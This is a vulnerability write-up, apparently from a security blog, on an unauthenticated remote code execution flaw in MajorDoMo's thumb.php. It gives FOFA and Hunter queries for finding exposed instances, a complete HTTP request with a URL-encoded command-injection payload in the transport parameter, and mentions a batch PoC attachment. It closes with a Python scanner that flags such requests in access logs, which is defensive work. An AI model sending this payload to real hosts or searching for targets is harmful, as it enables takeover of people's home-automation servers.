Vulnerability description
MajorDoMo is an open-source smart-home automation platform that lets users manage smart devices and household equipment through a central control system. Versions of MajorDoMo before commit 0662e5e contain an unauthenticated remote code execution (RCE) vulnerability.
Asset search
FOFA:
title="MajordomoSL"
icon_hash="1903390397"
Hunter:
web.title="MajordomoSL"
web.icon="08d30f79c76f124754ac6f7789ca3ab1"
Vulnerable endpoint
/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+echo+%27%5BD%5D%27%29%23%3B
Vulnerability reproduction
Request:
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+pwd%3B+echo+%27%5BD%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
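For detection, the request above has a recognisable shape: a hit on /modules/thumb/thumb.php whose transport parameter carries shell metacharacters once URL-decoded. The following scanner is an added example, not code from the original post or the MajorDoMo project; it assumes Apache combined-format access logs and runs over a few constructed sample lines (the first one reuses the request path shown above, the other two are benign requests):

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache combined format (not real traffic).
# Line 1 reuses the request path from the writeup; lines 2 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Jun/2024:15:47:56 +0000] "GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+echo+%27%5BD%5D%27%29%23%3B HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [05/Jun/2024:15:48:01 +0000] "GET /modules/thumb/thumb.php?url=aHR0cDovL2V4YW1wbGUuY29tL2EuanBn HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.12 - - [05/Jun/2024:15:48:05 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

VULN_PATH = "/modules/thumb/thumb.php"
# Characters that have no legitimate place in an RTSP transport option but
# are exactly what a shell command injection needs.
SHELL_META_RE = re.compile(r"[|;&`$()<>\n]")


def inspect_request(target):
    """Return a reason string if the request target looks like an attempt to
    abuse thumb.php's transport parameter, otherwise None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes values and turns '+' into spaces, so the check
    # runs on what the PHP side would actually see.
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if any(SHELL_META_RE.search(v) for v in params.get("transport", [])):
        reasons.append("shell metacharacters in transport")
    if "transport" in params and params.get("debug", [""])[0] == "1":
        reasons.append("debug=1 combined with transport")
    return "; ".join(reasons) or None


def scan_log(text):
    """Scan access-log text and return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = inspect_request(m.group("target"))
        if reason:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "reason": reason,
                "target": m.group("target"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['reason']}: {f['target']}")
```

Alerting on the metacharacter check alone is enough for this endpoint; the debug=1 condition is reported separately so that analysts can see which of the two signals fired. A status code of 200 on a flagged line means the server processed the request and is a good reason to check whether the instance is still on a version before commit 0662e5e.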
Batch PoC
Attachment: c25d15a0bc20240605154756.zip (zip file, 1.3K)